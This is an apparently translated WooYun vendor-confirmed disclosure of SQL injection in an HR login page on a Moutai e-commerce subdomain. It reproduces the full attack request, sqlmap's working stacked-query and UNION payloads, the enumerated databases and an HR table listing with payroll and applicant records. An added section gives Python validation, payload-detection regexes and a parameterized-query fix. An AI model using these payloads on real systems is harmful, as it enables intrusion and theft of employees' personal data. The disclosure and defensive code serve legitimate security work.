
Vulnerability summary

Defect ID: wooyun-2015-0162325

Title: SQL injection in a Moutai e-commerce system (exposes a large amount of information)

Vendor: emaotai.cn

Author: 路人甲

Submitted: 2015-12-18 10:46

Fix time: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-18: Details sent to the vendor; awaiting the vendor's handling
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and experts in the relevant field
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

Detailed description:

POST /HR/LoginTo.aspx HTTP/1.1
Content-Length: 2583
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCABDADDD=AMELIIPAGPFFMEGBLJGGOACJ; ASPSESSIONIDACADDADC=CBPLBNOAKCCIJBGGOMLMHMIN; ASP.NET_SessionId=b4fo3etcwb4xfls0stxndg2a
Host: gy.emaotai.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm%2bi1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho%2bahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs%2bWKqOe6quW%2bi%2bebkeWvn%2bWupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L%2bd566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD%2beUn%2ba0u%2bacjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu%2bmAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L%2bh5oGv5Lit5b%2bDHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y%2bR5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIf
AWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW%2bkOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee%2bih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw%3d%3d&__VIEWSTATEGENERATOR=CAB2EC08


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UsersPanel_cbxUsers_VI (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1';WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=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&__VIEWSTATEGENERATOR=CAB2EC08
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(74)+CHAR(70)+CHAR(88)+CHAR(99)+CHAR(77)+CHAR(83)+CHAR(78)+CHAR(69)+CHAR(73)+CHAR(76)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)-- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=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&__VIEWSTATEGENERATOR=CAB2EC08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] DrpECO
[*] EA
[*] gy
[*] HR
[*] HRTest
[*] master
[*] model
[*] moutaiBak
[*] moutaiDev
[*] moutaiTest
[*] msdb
[*] QRTest
[*] rsda
[*] tempdb
[*] test

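The sqlmap output above shows the injected field, UsersPanel_cbxUsers_VI, which in the legitimate request carries a small integer ("1"), and the two payload shapes that worked against it: a stacked query with WAITFOR DELAY and a UNION SELECT built from CHAR() calls. The following is an added defender-side example (my code, not the report author's, the vendor's, or sqlmap's) showing what a practitioner would want on the receiving end: an allow-list validator for that value-index field, a scanner that decodes a form body or a captured T-SQL statement and flags those payload shapes, and the remediation shape, a parameterized query. Assumptions: the sample request bodies are constructed from the parameters visible in the report (shortened; the real request also carries __VIEWSTATE and friends), the injected values are the ones sqlmap printed, URL-encoded as a browser would send them, and sqlite3 stands in for the SQL Server client purely to show parameter binding. Note that IIS W3C logs do not record POST bodies, so the scanner belongs in a request-filtering module or WAF, or over SQL Server audit output, not over access logs.

```python
"""Added defender-side example for the WooYun report (not code from the report or the vendor)."""
from __future__ import annotations

import re
import sqlite3
from urllib.parse import unquote_plus

# Signatures for the payload shapes seen in the report (MS SQL Server / T-SQL syntax).
INJECTION_SIGNATURES = {
    "stacked_query_time_delay": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.IGNORECASE),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE),
    "char_concat_chain": re.compile(r"(?:CHAR\(\d{1,3}\)\s*\+\s*){3,}CHAR\(\d{1,3}\)", re.IGNORECASE),
    "quote_then_comment": re.compile(r"'\s*(?:--|/\*)"),
}

# Assumption: the combo box value index (*_VI) is a short non-negative integer; nothing else is legitimate.
VALUE_INDEX_RE = re.compile(r"[0-9]{1,9}")


def is_valid_value_index(value: str) -> bool:
    """Allow-list check: accept only a short decimal integer for a *_VI field."""
    return VALUE_INDEX_RE.fullmatch(value) is not None


def parse_form_body(body: str) -> list[tuple[str, str]]:
    """Split an x-www-form-urlencoded body on '&' only (';' is part of the payload here) and decode."""
    pairs = []
    for chunk in body.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def match_signatures(text: str) -> list[str]:
    """Names of every signature that matches the already-decoded text."""
    return [name for name, rx in INJECTION_SIGNATURES.items() if rx.search(text)]


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each parameter whose decoded value triggers a signature to the signatures hit."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_form_body(body):
        hits = match_signatures(value)
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


def scan_sql_statement(sql: str) -> list[str]:
    """The same signatures applied to statement text captured on the database side."""
    return match_signatures(sql)


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the real user lookup (schema is hypothetical)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (value_index TEXT, user_code TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', '00000951')")
    return conn


def lookup_user_parameterized(conn: sqlite3.Connection, value_index: str):
    """Remediation shape: the value is bound as a parameter, never spliced into SQL text.
    In ASP.NET the equivalent is SqlCommand with SqlParameter; sqlite3 is only a stand-in."""
    row = conn.execute("SELECT user_code FROM users WHERE value_index = ?", (value_index,)).fetchone()
    return row[0] if row else None


# Constructed sample bodies (shortened from the request in the report).
BENIGN_BODY = ("btnlogin=&cbxOrgs_VI=98&tbxPassword=g00dPa%24%24w0rD"
               "&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_VI=1")
# sqlmap's stacked-query payload from the report, URL-encoded: 1';WAITFOR DELAY '0:0:5'--
TIME_DELAY_BODY = ("btnlogin=&cbxOrgs_VI=98&tbxPassword=g00dPa%24%24w0rD"
                   "&UsersPanel_cbxUsers_VI=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--")
# The UNION payload, URL-encoded (the '+' between CHAR() calls is sent as %2B).
UNION_BODY = ("btnlogin=&cbxOrgs_VI=98&UsersPanel_cbxUsers_VI=1%27+UNION+ALL+SELECT+"
              "CHAR(113)%2BCHAR(113)%2BCHAR(118)%2BCHAR(98)%2BCHAR(113)--+")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("time-delay", TIME_DELAY_BODY), ("union", UNION_BODY)):
        print(label, scan_form_body(body))
    print(is_valid_value_index("1"), is_valid_value_index("1';WAITFOR DELAY '0:0:5'--"))
    db = make_demo_db()
    print(lookup_user_parameterized(db, "1"), lookup_user_parameterized(db, "1';WAITFOR DELAY '0:0:5'--"))
```

The validator is the cheap, high-value fix for this specific field; the signature scanner is for detection and should be treated as a tripwire rather than a complete filter, since it only covers the shapes visible in this report. The parameterized lookup shows why the injected string becomes inert once it is bound as data: the same payload that delayed the real server for five seconds simply matches no row.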
15 databases in total; the current database is HR:

Database: HR
+------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------+---------+
| dbo.t_gz_ffb | 1690142 |
| dbo.v_gzb_view | 1690142 |
| dbo.t_gjj_ffb | 1602979 |
| dbo.v_gjj | 1602979 |
| dbo.t_zlbt_ffb | 1159908 |
| dbo.v_zlbt | 1159908 |
| dbo.t_nj_month | 677127 |
| dbo.t_sys_logs | 415324 |
| dbo.t_nj_ygtz | 342025 |
| dbo.v_nj_ygtz | 342025 |
| dbo.v_qynj | 342025 |
| dbo.t_gz_year | 202209 |
| dbo.t_nj_year | 118666 |
| dbo.v_da_ddjlb | 80073 |
| dbo.t_da_jt | 67327 |
| dbo.t_rygl_rygzgxb | 55518 |
| dbo.t_da_jl | 53607 |
| dbo.t_kq_hzb | 45436 |
| dbo.t_kq_kq | 36151 |
| dbo.v_kq_kq_cn | 36151 |
| dbo.v_kq_kq_cn | 36151 |
| dbo.t_sys_queue | 34627 |
| dbo.tmp_sb_ndbb | 32684 |
| dbo.t_gz_sw | 31389 |
| dbo.tmp_sb_yearydhj | 23987 |
| dbo.t_sbgl_ygsbhz | 23888 |
| dbo.t_da_index | 21799 |
| dbo.v_da_index | 21799 |
| dbo.v_gz_da1 | 21799 |
| dbo.v_gz_da_cn | 21799 |
| dbo.v_gz_da_cn | 21799 |
| dbo.v_gz_da_cn | 21799 |
| dbo.v_nj_da_import | 21799 |
| dbo.v_rs_da_cn | 21799 |
| dbo.v_rs_da_cn | 21799 |
| dbo.v_ry_fromGz | 21799 |
| dbo.v_sp_da | 21799 |
| dbo.t_gz_kjbz | 21739 |
| dbo.v_gz_kjbz | 21739 |
| dbo.t_zp_img | 21690 |
| dbo.v_nj_da_cn | 20532 |
| dbo.v_nj_da_cn | 20532 |
| dbo.v_nj_rylb | 20532 |
| dbo.t_ht_index | 20178 |
| dbo.v_da_ht_cn | 20178 |
| dbo.v_da_ht_cn | 20178 |
| dbo.v_ht_index | 20178 |
| dbo.v_ryda | 20134 |
| dbo.t_da_img | 19479 |
| dbo.t_da_ht_201301_bak | 15978 |
| dbo.t_da_ht_201301_bak | 15978 |
| dbo.t_zlbt_year_per | 14800 |
| dbo.tmp_t_gz_da | 14575 |
| dbo.t_gz_da_yf | 14276 |
| dbo.t_gz_da_cache | 14139 |
| dbo.gz201110 | 12410 |
| dbo.gz201109 | 12281 |
| dbo.t_da_ddjlb_999912 | 12281 |
| dbo.t_da_ddjlb_999912 | 12281 |
| dbo.t_xtgl_jsqx | 12197 |
| dbo.t_da_ht_bak | 12027 |
| dbo.v_da_rsdab | 11961 |
| dbo.t_da_zc | 11175 |
| dbo.v_da_zc | 11175 |
| dbo.tmp_rsda_wh | 10111 |
| dbo.t_rygl_gdkk | 9691 |
| dbo.t_nj_ffb | 9157 |
| dbo.t_sp_spbgmx_list | 9130 |
| dbo.t_sp_spbgmx_list | 9130 |
| dbo.t_sp_spbgmx_list | 9130 |
| dbo.v_sp_spbgmx_list | 9130 |
| dbo.v_sp_spbgmx_list | 9130 |
| dbo.v_sp_spbgmx_list | 9130 |
| dbo.t_nj_jcjlb | 8684 |
| dbo.v_da_old_bwh | 8194 |
| dbo.yhzh2 | 7916 |
| dbo.yhzh2 | 7916 |
| dbo.tmp_ndgz_tot | 7544 |
| dbo.t_da_zctz | 7509 |
| dbo.v_da_zctz | 7509 |
| dbo.t_zp_da | 6960 |
| dbo.zlbt | 6872 |
| dbo.t_rpt_ryddjl | 5860 |
| dbo.t_sys_Columdef | 5532 |
| dbo.t_rygl_csrq | 5102 |
| dbo.tmp_gzda_bwh | 3964 |
| dbo.t_hr_log | 2856 |
| dbo.tmp_dqht1 | 2674 |
| dbo.tmp_dqht2 | 2657 |
| dbo.t_gz_da_2 | 2648 |
| dbo.tmp_sb_kq | 2324 |
| dbo.t_da_rsdab_1 | 1797 |
| dbo.t_da_rsdab_1 | 1797 |
| dbo.tmp_kq_2013 | 1788 |
| dbo.tmp_sbnj | 1678 |
| dbo.t_xtgl_dwbmb | 1671 |
| dbo.t_xtgl_dwzzjgb | 1268 |
| dbo.v_xtgl_dwzzjgb | 1248 |
| dbo.t_zlbt_year_dpt | 1196 |
| dbo.t_cx_sql | 988 |
| dbo.t_sp_dwdl | 986 |
| dbo.t_xtgl_czryjs | 978 |
| dbo.t_xtgl_czryjs | 978 |
| dbo.tmp_yhjj_Import | 884 |
| dbo.t_gz_hzb | 815 |
| dbo.t_sys_fielddef | 795 |
| dbo.t_sp_tzjl | 777 |
| dbo.t_xtgl_jsgsb | 751 |
| dbo.t_da_jc | 684 |
| dbo.t_rygl_rydab_tx | 675 |
| dbo.tmp_gxbd_101 | 673 |
| dbo.tmp_gxbd_101 | 673 |
| dbo.tmp_gxbd_101 | 673 |
| dbo.tmp_gxbd_102 | 673 |
| dbo.t_gz_ffbt | 593 |
| dbo.v_gzbt | 593 |
| dbo.t_sp_spjl | 542 |
| dbo.t_sp_cljl | 508 |
| dbo.tmp_rybh | 506 |
| dbo.t_xtgl_dm | 501 |
| dbo.tmpYxtx | 470 |
| dbo.t_gjj_ffbt | 411 |
| dbo.v_xtgl_dm | 410 |
| dbo.t_zlbt_da_tmp | 403 |
| dbo.t_zlbt_da_tmp | 403 |
| dbo.tmp_dabh | 340 |
| dbo.t_zlbt_ffbt | 336 |
| dbo.t_zlbt_hzb | 313 |
| dbo.t_sys_tabledef | 310 |
| dbo.t_da_xs | 306 |
| dbo.cj1201 | 253 |
| dbo.tmpfzf1 | 211 |
| dbo.tmpgftx | 209 |
| dbo.t_sys_StoreProc | 197 |
| dbo.t_da_bdjl | 159 |
| dbo.tmp_njgl_2013txry | 157 |
| dbo.tmp_sb_tx | 153 |
| dbo.t_sys_project | 152 |
| dbo.SolarData | 150 |
| dbo.t_gz_da_bhw | 149 |
| dbo.t_xtgl_rjmkbmb | 142 |
| dbo.t_sys_code | 141 |
| dbo.t_da_rsdab_tmp | 130 |
| dbo.t_gjj_hzb | 122 |
| dbo.njkk2012 | 120 |
| dbo.t_nj_da_tmp | 100 |
| dbo.t_nj_da_tmp | 100 |
| dbo.t_px_tzpx | 100 |
| dbo.v_px_tzpx | 100 |
| dbo.t_xtgl_czjsb | 97 |
| dbo.t_gz_da_tmp | 94 |
| dbo.t_bank_import_gjj | 92 |
| dbo.t_bank_import_gjj | 92 |
| dbo.t_zlbt_log | 85 |
| dbo.tmp_gxbd201304 | 73 |
| dbo.tmp_da_rsdab | 54 |
| dbo.tmp_nj_2013 | 53 |
| dbo.tmp_rsda_bwh_end | 53 |
| dbo.tmp_rsda_bwh_end | 53 |
| dbo.tmpgflt | 48 |
| dbo.t_zp_jh | 36 |
| dbo.t_gz_da_12100002注销人员 | 32 |
| dbo.t_sys_haliday | 29 |
| dbo.t_cx_Rpt | 27 |
| dbo.t_gz_da_12100001注销人员 | 26 |
| dbo.t_gz_da_12100001注销人员 | 26 |
| dbo.t_gz_da_12100001注销人员 | 26 |
| dbo.t_cx_backup | 23 |
| dbo.t_nj_yfze | 20 |
| dbo.t_xtgl_csb | 18 |
| dbo.t_px_course | 17 |
| dbo.t_nj_yhllb | 16 |
| dbo.dtproperties | 14 |
| dbo.tm_nj_ygtz_1月征收 | 14 |
| dbo.tmpyxlt | 14 |
| dbo.t_sys_subject_dm | 13 |
| dbo.t_sys_subject_dm | 13 |
| dbo.t_xtgl_sydyb | 12 |
| dbo.t_xtgl_config | 10 |
| dbo.t_nj_ndze | 9 |
| dbo.t_help_book | 6 |
| dbo.tmp_cwgs | 6 |
| dbo.lst_dwTree_Nodes | 4 |
| dbo.t_xtgl_bgdyb | 4 |
| dbo.t_kq_grhz | 3 |
| dbo.t_kq_jqts | 3 |
| dbo.t_sys_totparams | 3 |
| dbo.v_kq_jqts | 3 |
| dbo.sysdiagrams | 2 |
| dbo.t_kq_qxj | 2 |
| dbo.t_px_org | 2 |
| dbo.t_xtgl_yhcp | 2 |
| dbo.v_kq_qxj | 2 |
| dbo.AspNet_SqlCacheTablesForChangeNotification | 1 |
| dbo.t_px_plan | 1 |
| dbo.t_sys_requirement | 1 |
| dbo.t_zp_gg | 1 |
| dbo.v_nj_ffbg | 1 |
| dbo.v_nj_ffbg | 1 |
+------------------------------------------------+---------+


A large amount of information is exposed. Since the table names follow no obvious pattern, I looked through a few tables:

Proof of vulnerability:

Table v_zlbt, over a million rows:

1.png

These appear to be payment records:

2.png


t_zp_da, job applicant information:

3.jpg

5.png


The HR database has more than 200 tables, so it certainly holds a great deal of data; I did not go through them one by one.

Fix recommendation:

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-12-18 11:42

Vendor reply:

Thank you for your report; we will fix it as soon as possible.

Latest status:

None yet